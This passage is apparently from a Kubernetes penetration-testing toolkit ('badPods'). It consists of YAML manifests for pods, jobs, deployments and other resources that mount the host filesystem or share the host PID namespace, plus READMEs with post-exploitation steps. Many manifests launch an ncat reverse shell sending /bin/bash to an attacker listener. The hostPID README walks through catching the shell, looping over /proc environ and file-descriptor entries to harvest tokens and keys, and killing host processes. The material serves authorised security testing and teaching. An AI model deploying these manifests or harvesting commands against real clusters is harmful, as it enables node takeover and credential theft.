-------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostpath-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | containers: 20 | - name: hostpath-revshell-replicationcontroller 21 | image: raesene/ncat 22 | volumeMounts: 23 | - mountPath: /host 24 | name: noderoot 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | -------------------------------------------------------------------------------- /manifests/hostpath/statefulset/hostpath-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostpath-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostpath-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostpath-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | containers: 36 | - name: hostpath-exec-statefulset 37 | image: ubuntu 38 | volumeMounts: 39 | - mountPath: /host 40 | name: noderoot 41 | command: [ "/bin/sh", "-c", "--" ] 42 | args: [ "while true; do sleep 30; done;" ] 43 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 44 | volumes: 45 | - name: noderoot 46 | hostPath: 47 | path: / 48 | -------------------------------------------------------------------------------- /manifests/hostpath/statefulset/hostpath-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostpath-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostpath-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostpath-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | containers: 36 | - name: hostpath-revshell-statefulset 37 | image: raesene/ncat 38 | volumeMounts: 39 | - mountPath: /host 40 | name: noderoot 41 | command: [ "/bin/sh", "-c", "--" ] 42 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 43 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 44 | 
volumes: 45 | - name: noderoot 46 | hostPath: 47 | path: / 48 | -------------------------------------------------------------------------------- /manifests/hostpid/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #5: hostPID 2 | ![](../../.github/images/Pod5.jpg) 3 | 4 | There’s no clear path to get root on the node with only `hostPID`, but there are still some good post-exploitation opportunities. 5 | * **View processes on the host** - When you run `ps` from within a pod that has `hostPID: true`, you see all the processes running on the host, including processes running within each pod. 6 | * **View the environment variables for each pod on the host** - With `hostPID: true`, you can read the /proc/[PID]/environ file for each process running on the host, including all processes running in pods. 7 | * **View the file descriptors for each pod on the host** - With `hostPID: true`, you can read /proc/[PID]/fd/[X] for each process running on the host, including all of the processes running in pods. Some of these allow you to read files that are opened within pods. 8 | * **Look for passwords, tokens, keys, etc.** - If you are lucky, you will find credentials and you’ll be able to use them to escalate privileges within the cluster, in services supported by the cluster, or in services that cluster-hosted applications communicate with. It is a long shot, but you might find a Kubernetes service account token or some other authentication material that allows you to access other namespaces and eventually escalate all the way up to cluster admin. 9 | * **Kill processes** - You can also kill any process on the node (presenting a denial-of-service risk), but I would advise against it on a penetration test! 10 | 11 | ## Table of Contents 12 | - [Bad Pod #5: hostPID](#bad-pod-5-hostpid) 13 | - [Table of Contents](#table-of-contents) 14 | - [Pod creation & access](#pod-creation--access) 15 | - [Exec pods](#exec-pods) 16 | - [Reverse shell pods](#reverse-shell-pods) 17 | - [Deleting resources](#deleting-resources) 18 | - [Post exploitation](#post-exploitation) 19 | - [View all processes running on the host and look for passwords, tokens, keys, etc.](#view-all-processes-running-on-the-host-and-look-for-passwords-tokens-keys-etc) 20 | - [View the environment variables for each pod on the host](#view-the-environment-variables-for-each-pod-on-the-host) 21 | - [View the file descriptors for each pod on the host](#view-the-file-descriptors-for-each-pod-on-the-host) 22 | - [Also, you can kill any process, but don't do that in production :)](#also-you-can-kill-any-process-but-dont-do-that-in-production-) 23 | - [Attacks that apply to all pods, even without any special permissions](#attacks-that-apply-to-all-pods-even-without-any-special-permissions) 24 | - [Demonstrate impact](#demonstrate-impact) 25 | - [References and further reading:](#references-and-further-reading) 26 | 27 | # Pod creation & access 28 | 29 | ## Exec pods 30 | Create one or more of these resource types and exec into the pod 31 | 32 | **Pod** 33 | ```bash 34 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml 35 | kubectl exec -it hostpid-exec-pod -- bash 36 | ``` 37 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 38 | 39 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc.
40 | 41 | ```bash 42 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/[RESOURCE_TYPE]/hostpid-exec-[RESOURCE_TYPE].yaml 43 | kubectl get pods | grep hostpid-exec-[RESOURCE_TYPE] 44 | kubectl exec -it hostpid-exec-[RESOURCE_TYPE]-[ID] -- bash 45 | ``` 46 | 47 | *Keep in mind that if a pod security policy blocks the pod, the resource type will still get created. The admission controller only blocks the pods that are created by the resource type.* 48 | 49 | To troubleshoot a case where you don't see pods, use `kubectl describe`: 50 | 51 | ``` 52 | kubectl describe [RESOURCE_TYPE] hostpid-exec-[RESOURCE_TYPE] 53 | ``` 54 | 55 | ## Reverse shell pods 56 | Create one or more of these resources and catch the reverse shell 57 | 58 | **Step 1: Set up listener** 59 | ```bash 60 | ncat --ssl -vlp 3116 61 | ``` 62 | 63 | **Step 2: Create the pod from the local manifest without modifying it, using env variables and envsubst** 64 | 65 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 66 | * Replace the HOST and PORT values to point the reverse shell to your listener 67 | 68 | ```bash 69 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/hostpid/[RESOURCE_TYPE]/hostpid-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 70 | ``` 71 | 72 | **Step 3: Catch the shell** 73 | ```bash 74 | $ ncat --ssl -vlp 3116 75 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 76 | Ncat: Listening on :::3116 77 | Ncat: Listening on 0.0.0.0:3116 78 | Connection received on 10.0.0.162 42035 79 | ``` 80 | 81 | ## Deleting resources 82 | You can delete a resource using its manifest, or by name. Here are some examples: 83 | ``` 84 | kubectl delete [type] [resource-name] 85 | kubectl delete -f manifests/hostpid/pod/hostpid-exec-pod.yaml 86 | kubectl delete -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml 87 | kubectl delete pod hostpid-exec-pod 88 | kubectl delete cronjob hostpid-exec-cronjob 89 | ``` 90 | 91 | # Post exploitation 92 | 93 | ## View all processes running on the host and look for passwords, tokens, keys, etc. 94 | ```bash 95 | ps -aux 96 | ...omitted for brevity... 97 | root 2123072 0.0 0.0 3732 2868 ? Ss 21:00 0:00 /bin/bash -c while true; do ./my-program --grafana-username=admin --grafana-password=admin; sleep 10;done 98 | ...omitted for brevity... 99 | ``` 100 | Check out that cleartext password in the `ps` output above! 101 | 102 | ## View the environment variables for each pod on the host 103 | The following command lists the environ file for each process running as UID 0 (see the note below on how to access PIDs running as a non-root UID). It uses `xargs` to split up the output so that each environment variable is on its own line: 104 | 105 | ```bash 106 | for e in `ls /proc/*/environ`; do echo; echo $e; xargs -0 -L1 -a $e; done > envs.txt 107 | ``` 108 | 109 | Now it's time to look for interesting environment variables. 110 | ```bash 111 | root@hostpid-exec-pod:/# less envs.txt 112 | ...omitted for brevity... 113 | 114 | /proc/578808/environ 115 | PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 116 | HOSTNAME=envar-demo 117 | NPM_CONFIG_LOGLEVEL=info 118 | NODE_VERSION=4.4.2 119 | DEMO_FAREWELL=Such a sweet sorrow 120 | DEMO_GREETING=Hello from the environment 121 | AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE 122 | AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY 123 | ...omitted for brevity...
124 | ``` 125 | Oh look, an AWS IAM user key and secret! 126 | 127 | **Note: This only works for containers, not for host processes** 128 | 129 | As far as I know, there is no way to get the environment variables from the host's own processes this way. It only works for other containers. 130 | 131 | **Note: To get environment variables for processes owned by a non-root user, you need to do some extra work** 132 | 133 | The for loop shown above only grabs environment variables from processes running within pods that share the same UID as your hostPID pod. By default, the badPods run as UID 0. Using our current `hostpid` pod, let's see which UIDs the host's processes are running as: 134 | 135 | ```bash 136 | root@hostpid-exec-pod:/# ps auxn | awk '{print $1}' | sort | uniq -c | sort -rn 137 | 205 0 138 | 9 999 139 | 8 1000 140 | 5 101 141 | 1 USER 142 | 1 104 143 | 1 103 144 | 1 102 145 | 1 1001 146 | 1 100 147 | 1 1 148 | ``` 149 | You can see that most processes on my cluster are running as root, but there are 9 PIDs running as UID 999. The only way I know to get the environment variables from those processes is to run a new pod with `runAsUser` set to the desired UID. Thanks to @rkervella for figuring that one out! Here's an example: 150 | 151 | ```bash 152 | cat hostpid-exec-pod-999.yaml 153 | apiVersion: v1 154 | kind: Pod 155 | metadata: 156 | name: hostpid-exec-pod-999 157 | labels: 158 | app: pentest 159 | spec: 160 | securityContext: 161 | runAsUser: 999 162 | runAsGroup: 999 163 | hostPID: true 164 | containers: 165 | - name: hostpid-pod-999 166 | image: ubuntu 167 | command: [ "/bin/sh", "-c", "--" ] 168 | args: [ "while true; do sleep 30; done;" ] 169 | ``` 170 | 171 | Now let's try it again from within our new pod running as UID/GID 999: 172 | 173 | ```bash 174 | I have no name!@hostpid-exec-pod-999:/$ for e in `ls /proc/*/environ`; do echo; echo $e; xargs -0 -L1 -a $e; done 175 | ...omitted for brevity... 176 | /proc/988058/environ 177 | PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 178 | HOSTNAME=argocd-server-69678b4f65-6mmql 179 | USER=argocd 180 | ARGOCD_METRICS_PORT=tcp://10.96.157.195:8082 181 | ARGOCD_REPO_SERVER_PORT=tcp://10.97.112.203:8081 182 | ARGOCD_REPO_SERVER_PORT_8084_TCP_PROTO=tcp 183 | ARGOCD_REPO_SERVER_PORT_8084_TCP_PORT=8084 184 | ARGOCD_SERVER_PORT_80_TCP_PORT=80 185 | ``` 186 | 187 | There we go! At some point I'll probably automate this so that I can spin up a new pod for each UID on the host. 188 | 189 | ## View the file descriptors for each pod on the host 190 | The following command lists the file descriptors for each PID that we have access to. See the note below on how to access FDs for non-root PIDs. 191 | 192 | ```bash 193 | for fd in `find /proc/*/fd`; do ls -al $fd/* 2>/dev/null | grep \>; done > fds.txt 194 | ``` 195 | 196 | Now it's time to look for interesting files. Oh look, a vim swap file! 197 | ```bash 198 | less fds.txt 199 | ...omitted for brevity... 200 | lrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/2 -> /dev/pts/0 201 | lrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/4 -> /.secret.txt.swp 202 | lrwx------ 1 root root 64 Jun 15 02:26 /proc/635975/fd/0 -> /dev/null 203 | l-wx------ 1 root root 64 Jun 15 02:26 /proc/635975/fd/1 -> pipe:[65069205] 204 | ``` 205 | 206 | Let's see what's in `/.secret.txt.swp`. This file exists within a container, but we can access it by reading `/proc/635813/fd/4`! 207 | 208 | ```bash 209 | cat /proc/635813/fd/4 210 | 3210#"!
UtadBnnmAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLEAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEYI'm going to keep my secrets in this file! 211 | ``` 212 | More secrets! 213 | 214 | **To access the FDs for PIDs owned by a non-root user, you need to do some extra work** 215 | 216 | The note about permissions in the previous section applies here as well. To access the file descriptors associated with processes within containers that are not running as UID 0, you'll need to spin up additional pods - one pod per UID you see on the host. 217 | 218 | 219 | ## Also, you can kill any process, but don't do that in production :) 220 | ``` 221 | pkill -f "nginx" 222 | ``` 223 | 224 | ## Attacks that apply to all pods, even without any special permissions 225 | * Cloud metadata service 226 | * `Kube-apiserver` or `kubelet` with `anonymous-auth` enabled 227 | * Kubernetes exploits 228 | * Hunting for vulnerable application/services in the cluster 229 | 230 | # Demonstrate impact 231 | 232 | If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test. 233 | 234 | # References and further reading: 235 | -------------------------------------------------------------------------------- /manifests/hostpid/cronjob/hostpid-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostpid-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostPID: true 15 | containers: 16 | - name: hostpid-exec-cronjob 17 | image: ubuntu 18 | command: [ "/bin/sh", "-c", "--" ] 19 | args: [ "while true; do sleep 30; done;" ] 20 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 21 | restartPolicy: OnFailure 22 | -------------------------------------------------------------------------------- /manifests/hostpid/cronjob/hostpid-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostpid-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostPID: true 15 | containers: 16 | - name: hostpid-revshell-cronjob 17 | image: raesene/ncat 18 | command: [ "/bin/sh", "-c", "--" ] 19 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 20 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 21 | restartPolicy: OnFailure 22 | -------------------------------------------------------------------------------- /manifests/hostpid/deamonset/hostpid-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostpid-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name:
hostpid-exec-daemonset 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/hostpid/deamonset/hostpid-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostpid-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: hostpid-revshell-daemonset 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/hostpid/deployment/hostpid-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostpid-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostPID: true 21 | containers: 22 | - name: hostpid-exec-deployment 23 | image: ubuntu 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "while true; do sleep 30; done;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/hostpid/deployment/hostpid-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostpid-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostPID: true 21 | containers: 22 | - name: hostpid-revshell-deployment 23 | image: raesene/ncat 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/hostpid/job/hostpid-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostpid-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostPID: true 12 | containers: 13 | - name: hostpid-exec-job 14 | image: ubuntu 15 | command: [ "/bin/sh", "-c", "--" ] 16 | args: [ "while true; do sleep 30; done;" ] 
17 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 18 | restartPolicy: OnFailure 19 | -------------------------------------------------------------------------------- /manifests/hostpid/job/hostpid-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostpid-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostPID: true 12 | containers: 13 | - name: hostpid-revshell-job 14 | image: raesene/ncat 15 | command: [ "/bin/sh", "-c", "--" ] 16 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 17 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 18 | restartPolicy: OnFailure 19 | -------------------------------------------------------------------------------- /manifests/hostpid/pod/hostpid-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostpid-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostPID: true 9 | containers: 10 | - name: hostpid-pod 11 | image: ubuntu 12 | command: [ "/bin/sh", "-c", "--" ] 13 | args: [ "while true; do sleep 30; done;" ] 14 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 15 | -------------------------------------------------------------------------------- /manifests/hostpid/pod/hostpid-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostpid-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostPID: true 9 | containers: 10 | - name: hostpid-pod 11 | image: raesene/ncat 12 | command: [ "/bin/sh", "-c", "--" ] 13 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 14 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/hostpid/replicaset/hostpid-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostpid-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: hostpid-exec-replicaset 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/hostpid/replicaset/hostpid-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostpid-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | 
selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: hostpid-revshell-replicaset 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/hostpid/replicationcontroller/hostpid-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostpid-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: hostpid-exec-replicationcontroller 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/hostpid/replicationcontroller/hostpid-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostpid-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: hostpid-revshell-replicationcontroller 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/hostpid/statefulset/hostpid-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostpid-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostpid-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostpid-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostPID: true 36 | containers: 37 | - name: hostpid-exec-statefulset 38 | image: ubuntu 39 | command: [ "/bin/sh", "-c", "--" ] 40 | args: [ "while true; do sleep 30; done;" ] 41 | #nodeName: k8s-control-plane-node # Force 
your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 42 | -------------------------------------------------------------------------------- /manifests/hostpid/statefulset/hostpid-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostpid-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostpid-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostpid-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostPID: true 36 | containers: 37 | - name: hostpid-revshell-statefulset 38 | image: raesene/ncat 39 | command: [ "/bin/sh", "-c", "--" ] 40 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 41 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 42 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #8: Nothing allowed 2 | ![](../../.github/images/Pod8.jpg) 3 | 4 | The pod security policy or admission controller has blocked access to all of the host's namespaces and restricted all capabilities. **Do not despair**, especially if the target cluster is running in a cloud environment. 5 | 6 | ## Table of Contents 7 | - [Bad Pod #8: Nothing allowed](#bad-pod-8-nothing-allowed) 8 | - [Table of Contents](#table-of-contents) 9 | - [Pod creation & access](#pod-creation--access) 10 | - [Exec pods](#exec-pods) 11 | - [Reverse shell pods](#reverse-shell-pods) 12 | - [Post exploitation](#post-exploitation) 13 | - [Cloud metadata](#cloud-metadata) 14 | - [AWS](#aws) 15 | - [GCP](#gcp) 16 | - [Overly permissive service account](#overly-permissive-service-account) 17 | - [Anonymous-auth](#anonymous-auth) 18 | - [Kernel, container engine, or Kubernetes exploits](#kernel-container-engine-or-kubernetes-exploits) 19 | - [Hunt for vulnerable services](#hunt-for-vulnerable-services) 20 | - [Reference(s):](#references) 21 | 22 | # Pod creation & access 23 | 24 | ## Exec pods 25 | Create one or more of these resource types and exec into the pod 26 | 27 | **Pod** 28 | ```bash 29 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml 30 | kubectl exec -it nothing-allowed-exec-pod -- bash 31 | ``` 32 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 33 | 34 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 35 | 36 | ```bash 37 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/[RESOURCE_TYPE]/nothing-allowed-exec-[RESOURCE_TYPE].yaml 38 | kubectl get pods | grep nothing-allowed-exec-[RESOURCE_TYPE] 39 | kubectl exec -it nothing-allowed-exec-[RESOURCE_TYPE]-[ID] -- bash 40 | ``` 41 | 42 | *Keep in mind that if a pod security policy blocks the pod, the resource type will still get created.
The admission controller only blocks the pods that are created by the resource type.* 43 | 44 | To troubleshoot a case where you don't see pods, use `kubectl describe`: 45 | 46 | ``` 47 | kubectl describe [RESOURCE_TYPE] nothing-allowed-exec-[RESOURCE_TYPE] 48 | ``` 49 | 50 | ## Reverse shell pods 51 | Create one or more of these resources and catch the reverse shell 52 | 53 | **Step 1: Set up listener** 54 | ```bash 55 | ncat --ssl -vlp 3116 56 | ``` 57 | 58 | **Step 2: Create the pod from the local manifest without modifying it, using env variables and envsubst** 59 | 60 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 61 | * Replace the HOST and PORT values to point the reverse shell to your listener 62 | 63 | ```bash 64 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/nothing-allowed/[RESOURCE_TYPE]/nothing-allowed-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 65 | ``` 66 | 67 | **Step 3: Catch the shell** 68 | ```bash 69 | $ ncat --ssl -vlp 3116 70 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 71 | Ncat: Listening on :::3116 72 | Ncat: Listening on 0.0.0.0:3116 73 | Connection received on 10.0.0.162 42035 74 | ``` 75 | 76 | # Post exploitation 77 | 78 | ## Cloud metadata 79 | If the cluster is cloud-hosted, try to access the cloud metadata service. You might get access to the IAM credentials associated with the node, or even find a cloud IAM credential created specifically for that pod. In either case, this can be your path to escalate 